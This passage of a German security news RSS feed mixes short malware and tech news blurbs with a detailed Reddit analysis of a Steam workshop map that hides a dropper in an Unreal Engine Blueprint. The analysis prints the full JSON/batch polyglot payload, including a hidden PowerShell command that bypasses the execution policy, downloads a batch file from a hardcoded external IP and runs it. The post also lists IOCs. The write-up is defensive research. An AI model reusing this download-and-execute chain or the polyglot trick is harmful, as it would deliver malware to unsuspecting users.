     • Joshua Hubner
    
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3691694/it+sicherheit/malware+trojaner+viren/etherhiding+malware+on+macos+how+attackers+hide+c2+on+the+blockchain/</link>
<pubDate>Fri, 24 Jul 2026 15:34:21 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-22 • Prophet Security
     • Joshua Hubner
    
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/43d4177c-d200-408f-92ff-94bf9313e3b8/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hörbuch-Downloads und Hörspiele im Juli 2026 – legal und illegal]]></title>
<description><![CDATA[Hier unser Update über alle Portale, die Hörbuch-Downloads und Hörspiele anbieten. Wer von den illegalen Websites ist derzeit noch online?
Der Artikel Hörbuch-Downloads und Hörspiele im Juli 2026 – legal und illegal erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3691053/it+sicherheit/malware+trojaner+viren/hoerbuch-downloads+und+hoerspiele+im+juli+2026+-+legal+und+illegal/</link>
<pubDate>Fri, 24 Jul 2026 10:51:32 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hier unser Update über alle Portale, die Hörbuch-Downloads und Hörspiele anbieten. Wer von den illegalen Websites ist derzeit noch online?</p>
<p>Der Artikel <a href="https://tarnkappe.info/listen/hoerbuch-downloads-und-hoerspiele-im-juli-2026-legal-und-illegal-331748.html">Hörbuch-Downloads und Hörspiele im Juli 2026 – legal und illegal</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[JadeProx: Tracing a China-nexus Operation Through an OPSEC Mistake]]></title>
<description><![CDATA[2026-07-23 • Group-IB
     • Group-IB
     • win.adaptix_c2, win.regeorg
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3690854/it+sicherheit/malware+trojaner+viren/jadeprox+tracing+a+china-nexus+operation+through+an+opsec+mistake/</link>
<pubDate>Fri, 24 Jul 2026 08:49:32 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-23 • Group-IB
     • Group-IB
     • win.adaptix_c2, win.regeorg
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/236991bd-00b0-4fa5-b365-98ba95259d4d/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[2 Types of People]]></title>
<description><![CDATA[Author: Avast - Bewertung: 1x - Views:3 The recommendation? Easy. Avast One.]]></description>
<link>https://tsecurity.de/de/3690429/it+sicherheit/malware+trojaner+viren/2+types+of+people/</link>
<pubDate>Fri, 24 Jul 2026 01:22:38 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Avast - Bewertung: 1x - Views:3 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/qw3cE5Rb7w4?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>The recommendation? Easy. Avast One.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[We recommend Avast One]]></title>
<description><![CDATA[Author: Avast - Bewertung: 0x - Views:0 The recommendation? Easy. Avast One.]]></description>
<link>https://tsecurity.de/de/3690372/it+sicherheit/malware+trojaner+viren/we+recommend+avast+one/</link>
<pubDate>Fri, 24 Jul 2026 00:37:03 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Avast - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/CVq036v1DkE?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>The recommendation? Easy. Avast One.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Banana RAT Evolves]]></title>
<description><![CDATA[Full report is available at https://any.run/cybersecurity-blog/banana-rat-evolution-analysis/ The exposed server at 198[.]245[.]53[.]26 gave a rare opportunity to compare two related Banana RAT branches through live infrastructure, sandbox telemetry, and recovered payloads. The older branch used ...]]></description>
<link>https://tsecurity.de/de/3690350/it+sicherheit/malware+trojaner+viren/banana+rat+evolves/</link>
<pubDate>Fri, 24 Jul 2026 00:21:12 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Full report is available at <a href="https://any.run/cybersecurity-blog/banana-rat-evolution-analysis/">https://any.run/cybersecurity-blog/banana-rat-evolution-analysis/</a></p> <p>The exposed server at 198[.]245[.]53[.]26 gave a rare opportunity to compare two related Banana RAT branches through live infrastructure, sandbox telemetry, and recovered payloads. The older branch used ETW-themed paths, static Microsoft-looking names, and a typo-based pseudo-Microsoft C2 identity. The newer branch kept the same staging concept but moved to randomized install identifiers, better-structured SYSTEM persistence, and a WebSocket channel built around a hashed <code>testewin.com</code> subdomain.</p> <p>IoC:</p> <ul> <li>198[.]245[.]53[.]26</li> <li><a href="https://app.any.run/tasks/96796146-688f-4b12-894c-236dadab8413">https://app.any.run/tasks/96796146-688f-4b12-894c-236dadab8413</a></li> </ul> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/rifteyy_"> /u/rifteyy_ </a> <br> <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1v4a0qc/banana_rat_evolves/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1v4a0qc/banana_rat_evolves/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Workshop map for MECCHA CHAMELEON is a malware dropper (full breakdown)]]></title>
<description><![CDATA[Table of Contents  Intro Initial Symptom First Look at the Workshop Files Verifying the Asset Files AssetRegistry.bin Reveals the First Clue Opening the UE5 Asset Container Reverse Engineering the Blueprint Extracting the Embedded Payload Analyzing the Dropper Script Confirming Execution on an Af...]]></description>
<link>https://tsecurity.de/de/3690349/it+sicherheit/malware+trojaner+viren/workshop+map+for+meccha+chameleon+is+a+malware+dropper+full+breakdown/</link>
<pubDate>Fri, 24 Jul 2026 00:21:11 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><h1>Table of Contents</h1> <ul> <li>Intro</li> <li>Initial Symptom</li> <li>First Look at the Workshop Files</li> <li>Verifying the Asset Files</li> <li>AssetRegistry.bin Reveals the First Clue</li> <li>Opening the UE5 Asset Container</li> <li>Reverse Engineering the Blueprint</li> <li>Extracting the Embedded Payload</li> <li>Analyzing the Dropper Script</li> <li>Confirming Execution on an Affected PC</li> <li>Did the Second Stage Execute?</li> <li>Analysis Summary</li> <li>Limitations &amp; Unknowns</li> <li>IOCs</li> <li>Final verdict</li> </ul> <p>A couple of my friends reported seeing a command prompt window briefly appear while Steam was downloading a custom workshop map. The map was being downloaded through the game's in-game lobby and, once the download completed it immediately began loading for the match. Since the command prompt window appeared during this transition, I decided to investigate the workshop files.</p> <p>What I found was a seemingly ordinary workshop map that contained what appears to be a malware dropper, despite having passed workshop review.</p> <p>I'm writing this up because, as far as I know, the map is still available, and because the techniques it uses to hide are worth understanding if you download workshop content. While there are still a few parts of the execution chain I can't fully explain, the artifacts themselves are interesting from a reverse engineering perspective.</p> <p><a href="https://preview.redd.it/nn7j9wf4q1fh1.png?width=1265&amp;format=png&amp;auto=webp&amp;s=0276954f24bafc16cee6b2fc2569c12bedeaea51">https://preview.redd.it/nn7j9wf4q1fh1.png?width=1265&amp;format=png&amp;auto=webp&amp;s=0276954f24bafc16cee6b2fc2569c12bedeaea51</a></p> <p><strong>1): The Initial Symptom</strong></p> <p>A black command prompt window flashed on screen for about a second before disappearing. It appeared while Steam was still downloading the workshop map, just as the game was transitioning into loading it for the match. There were no crashes, error messages, or any other unusual behavior. On its own, it would have been easy to dismiss as Steam running a background process, but seeing a console window appear during a workshop download / match launch was unusual enough that I decided to investigate.</p> <p><strong>2): First Look at the Workshop Files</strong></p> <p>The workshop content is located here:</p> <pre><code>Steam\steamapps\workshop\content\4704690\3765145606\ </code></pre> <p>At first glance, there’s nothing suspicious in the folder. The contents are:</p> <pre><code>AssetRegistry.bin Preview.png Sample.vdf SampleMyUGCMecchaCModKit_Load-Windows.pak SampleMyUGCMecchaCModKit_Load-Windows.ucas SampleMyUGCMecchaCModKit_Load-Windows.utoc </code></pre> <p>There are no executables, DLLs, batch files, or scripts. The <code>.pak</code>, <code>.ucas</code>, and <code>.utoc</code> files are simply the standard Unreal Engine 5 asset container format used for packaging game content exactly what you would expect to see from a UE5 map or mod.</p> <p>This is worth emphasizing: if you were manually checking this folder for malware, there would be no obvious red flags here. Nothing in this directory suggests anything malicious. That is likely why it passed review in the first place.</p> <p><strong>3): Verifying the Asset Files</strong></p> <p>File extensions are easy to spoof, so I checked the actual file headers and scanned the contents for embedded executable data.</p> <p>The results:</p> <ul> <li>utoc starts with <code>-==--==--==--==-</code>, which is the real IoStore magic</li> <li>pak has the correct <code>0x5A6F12E1</code> footer magic</li> <li>no MZ/PE, ELF or ZIP headers anywhere in any file</li> </ul> <p>The files appear to be valid Unreal Engine asset containers, not disguised executables. There is no standalone executable payload present in this mod. If there is unexpected behavior, it would have to be occurring through the game’s normal asset-loading pipeline rather than from an included executable file.</p> <p><strong>4): AssetRegistry.bin Reveals the First Clue</strong></p> <p>This is the detail that stands out most from the entire investigation.</p> <p>AssetRegistry.bin is largely readable metadata. You can open it in a text editor and see references to the actors placed throughout the maps. Normally, it contains exactly the kind of information you would expect: StaticMeshActor, PointLight, PlayerStart, and other standard Unreal Engine objects.</p> <p>However, one Blueprint actor immediately stands out:</p> <pre><code>/Game/Mods/NewMap.NewMap:PersistentLevel.BP_RCE_Test_C_0 </code></pre> <p>Its class resolves as:</p> <pre><code>BP_AmbientController_C </code></pre> <p>Those two names together are unusual. The class name suggests a harmless environmental or lighting-related system especially since it appears under folders such as Environment and Lighting. However, the placed actor still retains the older name BP_RCE_Test_C_0.</p> <p>In Unreal Engine, this can happen because placed actors keep the name they were created with even if the Blueprint class is later renamed. Renaming the class does not automatically rename every existing instance placed in maps.</p> <p>That means the BP_RCE_Test name likely existed at an earlier point in the asset’s history. Whether intentional or not, the old identifier remains embedded in the map metadata.</p> <p>The same reference appears across three separate maps included in the workshop item, including a NewMap_Backup file that appears to have been left in the upload.</p> <p><strong>5): Opening the UE5 Asset Container</strong></p> <p>The Blueprint data is stored inside the Oodle-compressed .ucas container. Reading the accompanying .utoc metadata reveals:</p> <pre><code>chunks ............ 57 blocks ............ 131 (130 Oodle-compressed) flags ............. Compressed | Indexed </code></pre> <p>No encryption flag is present, meaning the container can be inspected using available Unreal Engine asset tooling and compatible Oodle/Kraken decompression support. All 131 blocks decompress successfully, producing roughly 5.3 MB of extracted data.</p> <p>The container contains 55 assets in total: materials, meshes, textures, four maps, and three Blueprints. Two of those Blueprints appear to be untouched sample assets from the official ModKit, containing no custom logic.</p> <p>Searching across the extracted asset data revealed only a small number of notable references:</p> <pre><code>ReceiveBeginPlay ....... 1 ToFile ................. 1 GetPlatformUserDir ..... 1 powershell ............. 1 </code></pre> <p>These references are concentrated in a single Blueprint rather than being distributed throughout the package. There does not appear to be additional hidden logic elsewhere in the container, which makes the relevant behavior easier to isolate and analyze.</p> <p><strong>6): Reverse Engineering the Blueprint</strong></p> <p>The complete function chain is:</p> <pre><code>ReceiveBeginPlay ↓ GetPlatformUserDir ↓ Replace ↓ Concat_StrStr ↓ FromString (JSON) ↓ ToFile </code></pre> <p>Despite the Blueprint being named like an environment or lighting system, the logic does not appear to perform any lighting, ambience, or world-management functions. Instead, it constructs a file path and writes data to disk.</p> <p>Tracing the Blueprint bytecode shows the path construction:</p> <pre><code>dir = GetPlatformUserDir() // C:/Users/&lt;user&gt;/Documents/ path = dir + "s.bat" </code></pre> <p>ReceiveBeginPlay is normally called when the map begins loading, which does not fully match the behavior reported by some users, who observed activity during the download process itself. That discrepancy is not explained by the Blueprint logic alone, so it is worth treating those reports separately from the behavior confirmed through asset analysis.</p> <p><strong>7): Extracting the Embedded Payload</strong></p> <p>A single embedded string inside the Blueprint contains the following data:</p> <pre><code>{"x\"&amp;if not defined _Z (set _Z=1&amp;start /min cmd /c %~f0&amp;exit) else ( powershell -w hidden -ep bypass -c iwr http://31.57.34.228/work/steamb.bat -OutFile $env:TEMP\s.bat; cmd /c $env:TEMP\s.bat&amp;exit)&amp;\"x":"1"} </code></pre> <p>The string is structured as a JSON/batch polyglot: it is valid JSON while also containing batch command syntax inside the JSON key. The command content is therefore preserved when written as JSON data, but can also be interpreted as a batch script if the resulting file is executed.</p> <p>This format is significant because the earlier Blueprint analysis showed that the file-writing step uses <code>ToFile</code>, which writes JSON data. The embedded content appears designed to satisfy that JSON requirement while retaining executable command syntax.</p> <p>The combination of a JSON-compatible wrapper and embedded command execution logic is not typical of normal Unreal Engine asset data and is a strong indicator that the content was deliberately constructed rather than being accidental or generated by the engine.</p> <p><strong>8): Analyzing the Dropper Script</strong></p> <p>The extracted script is also human-readable:</p> <pre><code>if not defined _Z ( set _Z=1 start /min cmd /c %~f0 exit ) else ( powershell -w hidden -ep bypass -c ^ iwr http://31.57.34.228/work/steamb.bat -OutFile $env:TEMP\s.bat cmd /c $env:TEMP\s.bat exit ) </code></pre> <p>The script uses a simple two-stage execution flow.</p> <p>On the first run, <code>_Z</code> is not defined, so the script sets the variable, launches a minimized copy of itself, and exits. This relaunch behavior explains the brief command window flash reported by some users. At this stage, the script is acting as a launcher rather than performing the main action.</p> <p>On the second run, the <code>_Z</code> variable is already present, so the script follows the alternate branch. It starts PowerShell with a hidden window, modifies the execution policy for that process, downloads <code>steamb.bat</code> from a hardcoded external address, saves it to the temporary directory, and executes it.</p> <p>The <code>_Z</code> check appears to exist solely to prevent the script from repeatedly relaunching itself.</p> <p>The script itself is relatively simple: there is no evidence here of persistence mechanisms, privilege escalation, or sophisticated obfuscation. Its main purpose appears to be retrieving and executing a second-stage script. That second stage is hosted externally, meaning its contents can change independently of the original mod package.</p> <p><strong>9): Confirming Execution on an Affected PC</strong></p> <p>On one affected system, I found a file that was byte-for-byte identical to the payload string embedded in the Blueprint. It was located at the exact path identified during the bytecode analysis.</p> <p>This confirms that the Blueprint logic was not just theoretical, the file-writing behavior observed during reverse engineering occurred on a real system.</p> <p><a href="https://preview.redd.it/hav7l33dq1fh1.png?width=2252&amp;format=png&amp;auto=webp&amp;s=9fc74ff8ac7e3607889cb9a4f052d8d73e0f2f32">https://preview.redd.it/hav7l33dq1fh1.png?width=2252&amp;format=png&amp;auto=webp&amp;s=9fc74ff8ac7e3607889cb9a4f052d8d73e0f2f32</a></p> <p><strong>10): Did the second stage execute?</strong></p> <p>The second-stage file, <code>%TEMP%\s.bat</code>, was not present on the affected machine. The PowerShell Operational log explains why:</p> <p><a href="https://preview.redd.it/srmpq28pq1fh1.png?width=1577&amp;format=png&amp;auto=webp&amp;s=6a2841345f423906fafaa570acd20d85636e3b70">https://preview.redd.it/srmpq28pq1fh1.png?width=1577&amp;format=png&amp;auto=webp&amp;s=6a2841345f423906fafaa570acd20d85636e3b70</a></p> <p>The download request failed with an HTTP 404 response at the time of execution. Because the file was never successfully retrieved, nothing was written to disk and the following <code>cmd /c</code> command had no script to execute.</p> <p>On this system, the second stage did not execute. The contents and behavior of the downloaded payload remain unknown because the external file was unavailable at the time of analysis.</p> <p>The address embedded in the script resolves to <code>31.57.34.228</code>. At the time of analysis, the IP address was geolocated to Amsterdam, Netherlands, and was associated with Blockchain Creek B.V. (ASN 207994).</p> <p>This information identifies the hosting infrastructure used by the download URL, but it does not by itself identify the operator of the server or establish attribution. The important finding is that the Blueprint attempted to retrieve an additional payload from an external location, rather than containing the final payload entirely within the workshop files.</p> <p><a href="https://preview.redd.it/y1b4bj6sq1fh1.png?width=2546&amp;format=png&amp;auto=webp&amp;s=141474bd203a7d6529591ae09487da2e35e58026">https://preview.redd.it/y1b4bj6sq1fh1.png?width=2546&amp;format=png&amp;auto=webp&amp;s=141474bd203a7d6529591ae09487da2e35e58026</a></p> <p><strong>11): Analysis Summary</strong></p> <p>Based on the evidence recovered from the workshop item, this should be treated as malicious content. That conclusion does not rely on a single indicator; it comes from the combination of several independent findings:</p> <ul> <li>The Workshop uploader account appears to have been created only about one week before the item was published</li> <li>The Workshop map currently does not allow users to leave comments or ratings</li> <li>The only Blueprint containing custom logic was originally identified as <code>BP_RCE_Test</code> and later appeared under a name consistent with a harmless environment or lighting controller.</li> <li>The Blueprint executes automatically through <code>ReceiveBeginPlay</code>, rather than requiring an intentional user action inside the map.</li> <li>Its logic writes data outside the game directory into the user’s Documents folder, which is unrelated to normal map or asset behavior.</li> <li>The written content is a deliberately structured JSON/batch polyglot, allowing data written through a JSON-only function to retain executable batch syntax.</li> <li>That script launches hidden PowerShell, bypasses the local execution policy for the process, retrieves a second-stage file from a hardcoded external address, and attempts to execute it.</li> </ul> <p>What remains unknown is the purpose of the final payload. The second-stage script was not successfully retrieved during analysis and was no longer available from the remote location, so its behavior cannot be determined. Claims that it was specifically an infostealer, loader, or another type of malware would be speculation without that payload.</p> <p><strong>12): Limitations &amp; Unknowns</strong></p> <p><strong>What does</strong> <code>steamb.bat</code> <strong>do?</strong></p> <p>Unknown. The second-stage payload was not delivered during analysis, so its final behavior cannot be determined from the available evidence.</p> <h1>IOCs</h1> <pre><code>Workshop item 3765145606 "Laser Tag Neon" (appid 4704690) comments and ratings disabled on the listing uploader account roughly one week old Asset BP_AmbientController.uasset (originally BP_RCE_Test_C_0) Dropped file %USERPROFILE%\Documents\s.bat C2 http://31.57.34.228/work/steamb.bat Second stage steamb.bat (never delivered, contents unknown) Asset build 2026-06-09 22:37:14 s.bat 210 bytes sha256 1ff540bc3c493a93059e602b414ba61027ed1a2b8a079f6197b0718f4a2101b6 md5 04d6dfadd5248c995951707e27520ade container utoc aea429fbb44d552c917c22018e838e4154e68a8cac5806f7a8e30b61586ba2a6 ucas fbd932faba4ec8d614fbd7a68636e177213259bafe2babdcdc47c2a8acd6d569 pak aa58f9061a4e39e3f5a28395c56cfa5b0072d90e66054894f9c8022e81e396c9 </code></pre> <p><strong>Final Verdict</strong></p> <p>Based on everything I found, I believe this workshop item is very likely malicious, but there are still parts of the execution chain I couldn't directly observe.</p> <p>What I can say with confidence is that the asset contains a Blueprint whose only meaningful purpose is to write a batch file outside the game's directory into the user's Documents folder. That batch file then attempts to launch PowerShell with the execution policy bypassed, download a second batch file from a hard-coded external server, and execute it.</p> <p>I can't think of a legitimate reason for a Steam workshop map to write a .bat file into a user's Documents folder and then use PowerShell to fetch and run another <code>.bat</code> file from the Internet. Even without knowing what the second stage contained, that behavior is extremely difficult to explain as anything other than a malware delivery chain.</p> <p>Could there be some edge case I'm missing? Absolutely. That's why I've tried to separate facts from assumptions throughout this write-up. But given the evidence recovered from the assets themselves, I think calling this a malicious dropper is the conclusion best supported by the data</p> <p>Further independent investigation is encouraged, particularly if additional evidence becomes available. For now, the workshop item and the uploader have been reported and flagged for review.</p> <p>Cheers and stay safe!</p> <p>FeintBe</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/feintbe"> /u/feintbe </a> <br> <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1v4sged/workshop_map_for_meccha_chameleon_is_a_malware/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1v4sged/workshop_map_for_meccha_chameleon_is_a_malware/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Illegale IPTV-Nutzung: Polizei wirft Streamern jetzt Geldwäsche vor]]></title>
<description><![CDATA[Die Staatsanwaltschaft in Köln wirft Nutzern illegaler IPTV-Dienste im Rahmen der Strafverfolgung Geldwäsche vor, heißt es. Stimmt das?
Der Artikel Illegale IPTV-Nutzung: Polizei wirft Streamern jetzt Geldwäsche vor erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3689924/it+sicherheit/malware+trojaner+viren/illegale+iptv-nutzung+polizei+wirft+streamern+jetzt+geldwaesche+vor/</link>
<pubDate>Thu, 23 Jul 2026 20:06:56 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Die Staatsanwaltschaft in Köln wirft Nutzern illegaler IPTV-Dienste im Rahmen der Strafverfolgung Geldwäsche vor, heißt es. Stimmt das?</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/iptv/illegale-iptv-nutzung-polizei-wirft-streamern-jetzt-geldwaesche-vor-331728.html">Illegale IPTV-Nutzung: Polizei wirft Streamern jetzt Geldwäsche vor</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Selfie-Video: Gesicht wird zum Konto-Ersatzschlüssel]]></title>
<description><![CDATA[Google führt das Selfie-Video als neue Methode zur Kontowiederherstellung ein. Sicherer Kontozugriff oder Datenschutzrisiko?
Der Artikel Google Selfie-Video: Gesicht wird zum Konto-Ersatzschlüssel erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3689846/it+sicherheit/malware+trojaner+viren/google+selfie-video+gesicht+wird+zum+konto-ersatzschluessel/</link>
<pubDate>Thu, 23 Jul 2026 19:34:29 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google führt das Selfie-Video als neue Methode zur Kontowiederherstellung ein. Sicherer Kontozugriff oder Datenschutzrisiko?</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/it-sicherheit/datenschutz/google-selfie-video-gesicht-als-ersatzschluessel-fuers-konto-331721.html">Google Selfie-Video: Gesicht wird zum Konto-Ersatzschlüssel</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kaspersky’s Sustainability report 2024-2025: partnerships that make an impact]]></title>
<description><![CDATA[Author: Kaspersky - Bewertung: 0x - Views:1 In this video, we talk about how shared values, proven expertise, and transparent impact come together to address real social challenges. Watch to see how Kaspersky approaches responsible collaboration that delivers measurable results.

Find more detail...]]></description>
<link>https://tsecurity.de/de/3689449/it+sicherheit/malware+trojaner+viren/kasperskys+sustainability+report+2024-2025+partnerships+that+make+an+impact/</link>
<pubDate>Thu, 23 Jul 2026 17:05:42 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Kaspersky - Bewertung: 0x - Views:1 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/fLLG22LLSBI?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>In this video, we talk about how shared values, proven expertise, and transparent impact come together to address real social challenges. Watch to see how Kaspersky approaches responsible collaboration that delivers measurable results.<br />
<br />
Find more details in the report: https://kas.pr/7jar<br />
<br />
#kaspersky #esg #sustainability #cybersecurity #inclusion<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[WorldMonitor holt die Weltlage ins eigene Heimnetz]]></title>
<description><![CDATA[WorldMonitor mit Docker, Lemonade, NPU & Tailscale im Test. So entsteht eine private Informationsfläche mit lokaler KI und Datenimporten.
Der Artikel WorldMonitor holt die Weltlage ins eigene Heimnetz erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3689397/it+sicherheit/malware+trojaner+viren/worldmonitor+holt+die+weltlage+ins+eigene+heimnetz/</link>
<pubDate>Thu, 23 Jul 2026 16:51:20 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>WorldMonitor mit Docker, Lemonade, NPU &amp; Tailscale im Test. So entsteht eine private Informationsfläche mit lokaler KI und Datenimporten.</p>
<p>Der Artikel <a href="https://tarnkappe.info/test/worldmonitor-holt-die-weltlage-ins-eigene-heimnetz-331711.html">WorldMonitor holt die Weltlage ins eigene Heimnetz</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kaspersky’s Sustainability report 2024-2025: digital education for everyone]]></title>
<description><![CDATA[Author: Kaspersky - Bewertung: 0x - Views:3 Kaspersky explains why different vulnerable groups need different approaches to digital education — from children to elderly people, from non-profit organizations to people with disabilities. Watch to see how we build confidence and resilience in a rapi...]]></description>
<link>https://tsecurity.de/de/3689341/it+sicherheit/malware+trojaner+viren/kasperskys+sustainability+report+2024-2025+digital+education+for+everyone/</link>
<pubDate>Thu, 23 Jul 2026 16:20:47 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Kaspersky - Bewertung: 0x - Views:3 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/Gihx6_apVPA?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Kaspersky explains why different vulnerable groups need different approaches to digital education — from children to elderly people, from non-profit organizations to people with disabilities. Watch to see how we build confidence and resilience in a rapidly changing digital world.<br />
<br />
Find more details in the report: https://kas.pr/7jar<br />
<br />
#kaspersky #esg #sustainability #cybersecurity #inclusion<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kaspersky’s Sustainability report 2024-2025: supporting vulnerable communities]]></title>
<description><![CDATA[Author: Kaspersky - Bewertung: 0x - Views:1 In this video Kaspersky explores what it means to protect vulnerable and digitally vulnerable groups, and why these challenges differ online and offline. Learn about the barriers people face, the importance of digital confidence, and how we support comm...]]></description>
<link>https://tsecurity.de/de/3689131/it+sicherheit/malware+trojaner+viren/kasperskys+sustainability+report+2024-2025+supporting+vulnerable+communities/</link>
<pubDate>Thu, 23 Jul 2026 15:06:57 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Kaspersky - Bewertung: 0x - Views:1 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/8xzvv1ZD5KQ?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>In this video Kaspersky explores what it means to protect vulnerable and digitally vulnerable groups, and why these challenges differ online and offline. Learn about the barriers people face, the importance of digital confidence, and how we support communities that need it most. <br />
<br />
Find more details in the report: https://kas.pr/7jar <br />
<br />
#kaspersky #esg #sustainability #cybersecurity #inclusion<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kaspersky’s Sustainability report 2024-2025: protecting data, building trust]]></title>
<description><![CDATA[Author: Kaspersky - Bewertung: 2x - Views:4 Data security is a core part of how Kaspersky protects its products and users. In this video we talk about our approach to protecting data, the measures behind it and why continuous improvement matters. Watch to learn how we build trust through responsi...]]></description>
<link>https://tsecurity.de/de/3688971/it+sicherheit/malware+trojaner+viren/kasperskys+sustainability+report+2024-2025+protecting+data+building+trust/</link>
<pubDate>Thu, 23 Jul 2026 14:05:55 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Kaspersky - Bewertung: 2x - Views:4 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/kzfK4yVPNj4?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Data security is a core part of how Kaspersky protects its products and users. In this video we talk about our approach to protecting data, the measures behind it and why continuous improvement matters. Watch to learn how we build trust through responsibility and resilience. <br />
<br />
Find more details in the report: https://kas.pr/7jar<br />
 <br />
#kaspersky #esg #sustainability #cybersecurity<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kaspersky’s Sustainability report 2024-2025: collaboration in action]]></title>
<description><![CDATA[Author: Kaspersky - Bewertung: 1x - Views:2 Kaspersky’s responsibility starts with cooperation and respect. In this video we discuss our key stakeholders and how we work together to protect what matters most, strengthening digital safety for everyone. 

Find more details in the report: https://ka...]]></description>
<link>https://tsecurity.de/de/3688806/it+sicherheit/malware+trojaner+viren/kasperskys+sustainability+report+2024-2025+collaboration+in+action/</link>
<pubDate>Thu, 23 Jul 2026 13:08:01 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Kaspersky - Bewertung: 1x - Views:2 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/v5q2y9awFnM?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Kaspersky’s responsibility starts with cooperation and respect. In this video we discuss our key stakeholders and how we work together to protect what matters most, strengthening digital safety for everyone. <br />
<br />
Find more details in the report: https://kas.pr/7jar <br />
